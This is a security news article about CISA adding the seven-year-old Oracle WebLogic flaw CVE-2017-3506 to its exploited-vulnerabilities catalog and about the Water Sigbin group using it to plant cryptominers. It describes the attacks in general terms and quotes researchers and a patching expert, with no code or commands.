7-year-old Oracle WebLogic bug under active exploitation

A seven-year-old Oracle vulnerability is the latest to be added to CISA's Known Exploited Vulnerability (KEV) catalog, meaning the security agency considers it a significant threat to federal government.

CVE-2017-3506 affects Oracle's WebLogic Server, allowing for remote command execution on affected operating systems. Carrying a 7.4 severity, patches were originally released for it in April 2017, but recent research suggests it's now being exploited by financially motivated Chinese cybercriminals.

According to security shop Trend Micro's recent work, the group it tracks as Water Sigbin (also known as 8220 Gang) is weaponizing CVE-2017-3506 alongside a second, more recent Oracle WebLogic vuln (CVE-2023-21839) to deploy cryptocurrency miners on targeted hosts.

"Water Sigbin's activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the adaptability of modern threat actors," wrote Sunil Bharti, senior threat researcher at Trend Micro.

"The use of sophisticated obfuscation techniques such as hexadecimal encoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and layered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a threat actor that can capably hide its tracks, making detection and prevention more challenging for security teams."

Trellix (formerly FireEye and McAfee Enterprise) previously assessed that CVE-2017-3506 was also used alongside three other WebLogic bugs to break into Superion's Click2Gov's servers back in 2017.

Attackers were thought to have combined vulnerabilities into an exploit chain to ultimately steal payment card information from county governments across the US. It was the earliest sign of attackers abusing CVE-2017-3506 and it's clearly still attractive enough to attackers to prompt the US government into action.

Water Sigbin was first spotted in 2017 and has focused much of its efforts since on the cryptojacking and cryptominer games, evolving its tradecraft consistently and regularly throughout that time.

• London hospitals declare critical incident after service partner ransomware attack
• Check Point warns customers to patch VPN vulnerability under active exploitation
• Cyber cops plead for info on elusive Emotet mastermind
• Bayer and 12 other major drug companies caught up in Cencora data loss

The group is known for targeting Oracle WebLogic flaws, as well as log4j, Atlassian Confluence bugs, and misconfigured Docker containers to infect hosts with whatever malware it feels like using. Sometimes it's a cryptominer like XMRig, other times it's a DDoS botnet like Tsunami – it changes often.

In some cases, though, its tradecraft remains the same. Trend Micro looked into the group in May 2023 after it was observed exploiting CVE-2017-3506 in separate, earlier attacks. It said that despite some researchers branding the group "script kiddies," in Trend's view it's a "threat to be reckoned with."

As for why the necessary patches haven't been applied after so many years, Iain Saunderson, CTO at Spinnaker Support, told El Reg: "Customers don't apply because either it's too much work or the patch is not available for the version they are running, due to Oracle desupport."

Saunderson went to on say Oracle is known for re-releasing CVE patches if it deems them necessary.

"The CVE was only released once but apparently, seven years later, it was found to not have fixed the issue," he said. "I suspect Oracle will release a special patch or patch it in either July or October during their next patching cycle." ®